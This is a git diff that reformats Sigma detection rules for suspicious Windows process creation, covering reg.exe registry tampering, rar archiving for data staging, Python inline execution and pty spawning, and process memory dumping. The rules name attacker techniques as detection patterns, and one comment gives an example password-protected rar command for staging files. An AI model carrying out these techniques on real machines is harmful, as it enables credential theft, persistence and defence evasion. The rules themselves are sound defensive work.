a/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml b/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml index be5380bd5..fd9edd51f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml @@ -1,10 +1,7 @@ title: PUA - WebBrowserPassView Execution id: d0dae994-26c6-4d2d-83b5-b3c8b79ae513 status: test -description: Detects the execution of WebBrowserPassView.exe. A password recovery - tool that reveals the passwords stored by the following Web browsers, Internet - Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, - Safari, and Opera +description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md author: frack113 @@ -21,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - Description: Web Browser Password Viewer - - NewProcessName|endswith: \WebBrowserPassView.exe + - Description: Web Browser Password Viewer + - NewProcessName|endswith: \WebBrowserPassView.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml index a143abbd2..569a8c6bf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml @@ -1,9 +1,7 @@ title: PUA - Wsudo Suspicious Execution id: bdeeabc9-ff2a-4a51-be59-bb253aac7891 status: test -description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let - the user execute programs with different permissions (System, Trusted Installer, - Administrator...etc) +description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) references: - https://github.com/M2Team/Privexec/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: \wsudo.exe - - OriginalFileName: wsudo.exe - - Description: Windows sudo utility - - ParentProcessName|endswith: \wsudo-bridge.exe + - NewProcessName|endswith: \wsudo.exe + - OriginalFileName: wsudo.exe + - Description: Windows sudo utility + - ParentProcessName|endswith: \wsudo-bridge.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -u System - -uSystem - -u TrustedInstaller diff --git a/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml b/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml index ae27a91bc..778f36049 100644 --- a/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml @@ -1,12 +1,9 @@ title: PUA - Adidnsdump Execution id: 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160 status: test -description: 'This tool enables enumeration and exporting of all DNS records in the - zone for recon purposes of internal networks Python 3 and python.exe must be installed, - +description: | + This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump author: frack113 @@ -23,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: adidnsdump - NewProcessName|endswith: \python.exe + CommandLine|contains: adidnsdump + NewProcessName|endswith: \python.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml index b9a4b8ccd..73f764060 100644 --- a/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Python Inline Command Execution id: 899133d5-4d7c-4a7f-94ee-27355c879d90 status: test -description: Detects execution of python using the "-c" flag. This is could be used - as a way to launch a reverse shell or execute live python code. +description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. references: - https://docs.python.org/3/using/cmdline.html#cmdoption-c - https://www.revshells.com/ @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: python.exe - - NewProcessName|endswith: - - python.exe - - python3.exe - - python2.exe + - OriginalFileName: python.exe + - NewProcessName|endswith: + - python.exe # no \ bc of e.g. ipython.exe + - python3.exe + - python2.exe selection_cli: - CommandLine|contains: ' -c' - filter_python: + CommandLine|contains: ' -c' + filter_python: # Based on baseline ParentCommandLine|contains: -E -s -m ensurepip -U --default-pip ParentProcessName|startswith: C:\Program Files\Python ParentProcessName|endswith: \python.exe @@ -36,7 +35,6 @@ detection: ParentProcessName|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Python libraries that use a flag starting with "-c". Filter according to your - environment + - Python libraries that use a flag starting with "-c". Filter according to your environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml b/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml index 8ec75bf8c..c04ca22a9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml @@ -1,8 +1,8 @@ title: Python Spawning Pretty TTY on Windows id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d related: - - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 - type: derived + - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 + type: derived status: test description: Detects python spawning a pretty tty references: @@ -20,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: - - python.exe + NewProcessName|endswith: + - python.exe # no \ bc of e.g. ipython.exe - python3.exe - python2.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - import pty - .spawn( selection_cli_2: - CommandLine|contains: from pty import spawn + CommandLine|contains: from pty import spawn condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml b/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml index e224e5be1..560681d4c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml +++ b/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml @@ -1,8 +1,7 @@ title: Query Usage To Exfil Data id: 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 status: test -description: Detects usage of "query.exe" a system binary to exfil information such - as "sessions" and "processes" for later use +description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - session > - process > - NewProcessName|endswith: :\Windows\System32\query.exe + NewProcessName|endswith: :\Windows\System32\query.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml b/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml index 0825a007f..26ff9b45d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml @@ -1,10 +1,7 @@ title: Files Added To An Archive Using Rar.EXE id: 6f3e2987-db24-4c78-a860-b4f4095a7095 status: test -description: Detects usage of "rar" to add files to an archive for potential compression. - An adversary may compress data (e.g. sensitive documents) that is collected prior - to exfiltration in order to make it portable and minimize the amount of data sent - over the network. +description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md - https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html @@ -22,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' a ' - NewProcessName|endswith: \rar.exe + CommandLine|contains: ' a ' + NewProcessName|endswith: \rar.exe condition: process_creation and selection falsepositives: - Highly likely if rar is a default archiver in the monitored environment. diff --git a/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml b/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml index 559de6f80..b9618d17c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml @@ -1,9 +1,7 @@ title: Rar Usage with Password and Compression Level id: faa48cae-6b25-4f00-a094-08947fef582f status: test -description: Detects the use of rar.exe, on the command line, to create an archive - with password protection or with a specific compression level. This is pretty - indicative of malicious actions. +description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. references: - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ - https://ss64.com/bash/rar.html @@ -22,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection_password: - CommandLine|contains: ' -hp' + CommandLine|contains: ' -hp' selection_other: - CommandLine|contains: + CommandLine|contains: - ' -m' - ' a ' condition: process_creation and (selection_password and selection_other) diff --git a/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml b/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml index a6fac3d45..899a22d34 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml @@ -1,8 +1,7 @@ title: Suspicious Greedy Compression Using Rar.EXE id: afe52666-401e-4a02-b4ff-5d128990b8cb status: experimental -description: Detects RAR usage that creates an archive from a suspicious folder, either - a system folder or one of the folders often used by attackers for staging purposes +description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes references: - https://decoded.avast.io/martinchlumecky/png-steganography author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) @@ -15,22 +14,23 @@ logsource: product: windows category: process_creation detection: + # Example : rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt >nul process_creation: EventID: 4688 Channel: Security selection_opt_1: - - NewProcessName|endswith: \rar.exe - - Description: Command line RAR + - NewProcessName|endswith: \rar.exe + - Description: Command line RAR selection_opt_2: - CommandLine|contains: + CommandLine|contains: - '.exe a ' - ' a -m' selection_cli_flags: - CommandLine|contains|all: - - ' -hp' - - ' -r ' + CommandLine|contains|all: + - ' -hp' # password + - ' -r ' # recursive selection_cli_folders: - CommandLine|contains: + CommandLine|contains: - ' ?:\\\*.' - ' ?:\\\\\*.' - ' ?:\$Recycle.bin\' diff --git a/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml index 11601d63b..80dc38980 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml @@ -19,10 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: rasdial.exe + NewProcessName|endswith: rasdial.exe condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml b/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml index 69bc032ad..ad28fe081 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml @@ -1,18 +1,16 @@ title: Process Memory Dump via RdrLeakDiag.EXE id: edadb1e5-5919-4e4c-8462-a9e643b02c4b related: - - id: 6355a919-2e97-4285-a673-74645566340d - type: obsoletes + - id: 6355a919-2e97-4285-a673-74645566340d + type: obsoletes status: test -description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool - "rdrleakdiag.exe" to dump process memory +description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory references: - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/ - https://twitter.com/0gtweet/status/1299071304805560321?s=21 -author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, - Nasreddine Bencherchali (Nextron Systems) +author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2021/09/24 modified: 2023/04/24 tags: @@ -26,23 +24,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rdrleakdiag.exe - - OriginalFileName: RdrLeakDiag.exe + - NewProcessName|endswith: \rdrleakdiag.exe + - OriginalFileName: RdrLeakDiag.exe selection_cli_dump: - CommandLine|contains: + CommandLine|contains: - fullmemdmp - /memdmp - -memdmp selection_cli_output: - CommandLine|contains: + CommandLine|contains: - ' -o ' - ' /o ' selection_cli_process: - CommandLine|contains: + CommandLine|contains: - ' -p ' - ' /p ' - condition: process_creation and (all of selection_cli_* or (selection_img and - selection_cli_dump)) + condition: process_creation and (all of selection_cli_* or (selection_img and selection_cli_dump)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml b/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml index 2efe20039..726135f2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_add_run_key.yml @@ -1,8 +1,7 @@ title: Potential Persistence Attempt Via Run Keys Using Reg.EXE id: de587dce-915e-4218-aac4-835ca6af6f70 status: test -description: Detects suspicious command line reg.exe tool adding key to RUN key in - Registry +description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry references: - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/ - https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys @@ -20,14 +19,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - reg - ' ADD ' - Software\Microsoft\Windows\CurrentVersion\Run condition: process_creation and selection falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reasons. + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml b/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml index 3bf1728a9..7d73869fd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_add_safeboot.yml @@ -1,12 +1,10 @@ title: Add SafeBoot Keys Via Reg Utility id: d7662ff6-9e97-4596-a61d-9839e32dee8d related: - - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de - type: similar + - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de + type: similar status: test -description: Detects execution of "reg.exe" commands with the "add" or "copy" flags - on safe boot registry keys. Often used by attacker to allow the ransomware to - work in safe mode as some security products do not +description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not references: - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: reg.exe + - OriginalFileName: reg.exe selection_safeboot: - CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot + CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot selection_flag: - CommandLine|contains: + CommandLine|contains: - ' copy ' - ' add ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml b/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml index fc98c8723..af32ff497 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_bitlocker.yml @@ -1,8 +1,7 @@ title: Suspicious Reg Add BitLocker id: 0e0255bf-2548-47b8-9582-c0955c9283f5 status: test -description: Detects suspicious addition to BitLocker related registry keys via the - reg.exe utility +description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility references: - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ author: frack113 @@ -19,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - REG - ADD - \SOFTWARE\Policies\Microsoft\FVE - /v - /f - CommandLine|contains: + CommandLine|contains: - EnableBDEWithNoTPM - UseAdvancedStartup - UseTPM diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml b/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml index 44cdd06a0..7da8ea400 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml @@ -1,8 +1,7 @@ title: Dropping Of Password Filter DLL id: b7966f4a-b333-455b-8370-8ca53c229762 status: test -description: Detects dropping of dll files in system32 that may be used to retrieve - user credentials from LSASS +description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS references: - https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/ - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection_cmdline: - CommandLine|contains|all: + CommandLine|contains|all: - HKLM\SYSTEM\CurrentControlSet\Control\Lsa - scecli\0* - reg add diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml b/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml index 95af7a388..4bb15a40b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_defender_exclusion.yml @@ -1,9 +1,7 @@ title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE id: 48917adc-a28e-4f5d-b729-11e75da8941f status: test -description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot - has been seen using this technique to add exclusions for folders within AppData - and ProgramData. +description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - https://redcanary.com/threat-detection-report/threats/qbot/ @@ -21,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths - SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths - CommandLine|contains|all: + CommandLine|contains|all: - 'ADD ' - '/t ' - 'REG_DWORD ' - '/v ' - '/d ' - '0' - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml b/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml index b2d62ee41..0d7acf9a9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_delete_safeboot.yml @@ -1,12 +1,10 @@ title: SafeBoot Registry Key Deleted Via Reg.EXE id: fc0e89b5-adb0-43c1-b749-c12a10ec37de related: - - id: d7662ff6-9e97-4596-a61d-9839e32dee8d - type: similar + - id: d7662ff6-9e97-4596-a61d-9839e32dee8d + type: similar status: test -description: Detects execution of "reg.exe" commands with the "delete" flag on safe - boot registry keys. Often used by attacker to prevent safeboot execution of security - products +description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton @@ -23,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: reg.exe + - OriginalFileName: reg.exe selection_delete: - CommandLine|contains|all: + CommandLine|contains|all: - ' delete ' - \SYSTEM\CurrentControlSet\Control\SafeBoot condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml b/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml index 430569bf4..58a884806 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_delete_services.yml @@ -1,8 +1,7 @@ title: Service Registry Key Deleted Via Reg.EXE id: 05b2aa93-1210-42c8-8d9a-2fcc13b284f5 status: test -description: Detects execution of "reg.exe" commands with the "delete" flag on services - registry key. Often used by attacker to remove AV software services +description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services references: - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: reg.exe + - OriginalFileName: reg.exe selection_delete: - CommandLine|contains: ' delete ' + CommandLine|contains: ' delete ' selection_key: - CommandLine|contains: \SYSTEM\CurrentControlSet\services\ + # Add specific services if you would like the rule to be more specific + CommandLine|contains: \SYSTEM\CurrentControlSet\services\ condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml b/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml index bf7be2e76..8105dc84c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_desktop_background_change.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious Desktop Background Change Using Reg.EXE id: 8cbc9475-8d05-4e27-9c32-df960716c701 related: - - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae - type: similar + - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae + type: similar status: experimental -description: 'Detects the execution of "reg.exe" to alter registry keys that would - replace the user''s desktop background. - - This is a common technique used by malware to change the desktop background to - a ransom note or other image. - - ' +description: | + Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. + This is a common technique used by malware to change the desktop background to a ransom note or other image. references: - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ @@ -29,35 +25,34 @@ logsource: product: windows category: process_creation detection: + # TODO: Improve this to also focus on variation using PowerShell and other CLI tools process_creation: EventID: 4688 Channel: Security selection_reg_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_reg_flag: - CommandLine|contains: add + CommandLine|contains: add selection_keys: - CommandLine|contains: + CommandLine|contains: - Control Panel\Desktop - CurrentVersion\Policies\ActiveDesktop - CurrentVersion\Policies\System selection_cli_reg_1: - CommandLine|contains|all: + CommandLine|contains|all: - /v NoChangingWallpaper - - /d 1 + - /d 1 # Prevent changing desktop background selection_cli_reg_2: - CommandLine|contains|all: + CommandLine|contains|all: - /v Wallpaper - /t REG_SZ selection_cli_reg_3: - CommandLine|contains|all: + CommandLine|contains|all: - /v WallpaperStyle - - /d 2 - condition: process_creation and (all of selection_reg_* and selection_keys and - 1 of selection_cli_reg_*) + - /d 2 # Stretch + condition: process_creation and (all of selection_reg_* and selection_keys and 1 of selection_cli_reg_*) falsepositives: - - Administrative scripts that change the desktop background to a company logo - or other image. + - Administrative scripts that change the desktop background to a company logo or other image. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml b/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml index ba3a21cc6..fdc873296 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml @@ -1,8 +1,7 @@ title: Direct Autorun Keys Modification id: 24357373-078f-44ed-9ac4-6d334a668a11 status: test -description: Detects direct modification of autostart extensibility point (ASEP) in - registry using reg.exe. +description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: add - NewProcessName|endswith: \reg.exe + CommandLine|contains: add # to avoid intersection with discovery tactic rules + NewProcessName|endswith: \reg.exe selection_2: - CommandLine|contains: - - \software\Microsoft\Windows\CurrentVersion\Run + CommandLine|contains: # need to improve this list, there are plenty of ASEP reg keys + - \software\Microsoft\Windows\CurrentVersion\Run # Also covers the strings "RunOnce", "RunOnceEx", "RunServices", "RunServicesOnce" - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit - \software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell - \software\Microsoft\Windows NT\CurrentVersion\Windows @@ -34,8 +33,7 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reasons. + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml b/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml index 51148fe19..e2d38ed7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_disable_sec_services.yml @@ -1,8 +1,7 @@ title: Security Service Disabled Via Reg.EXE id: 5e95028c-5229-4214-afae-d653d573d0ec status: test -description: Detects execution of "reg.exe" to disable security services such as Windows - Defender. +description: Detects execution of "reg.exe" to disable security services such as Windows Defender. references: - https://twitter.com/JohnLaTwC/status/1415295021041979392 - https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1 @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_reg_add: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add selection_cli_reg_start: - CommandLine|contains|all: + CommandLine|contains|all: - d 4 - v Start - CommandLine|contains: + CommandLine|contains: - \AppIDSvc - \MsMpSvc - \NisSrv diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml b/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml index a00fb9530..f3abf9818 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml @@ -1,21 +1,19 @@ title: Dumping of Sensitive Hives Via Reg.EXE id: fd877b94-9bb5-4191-bb25-d79cbd93c167 related: - - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e - type: obsoletes - - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 - type: obsoletes + - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e + type: obsoletes + - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 + type: obsoletes status: test -description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. - This includes SAM, SYSTEM and SECURITY hives. +description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - 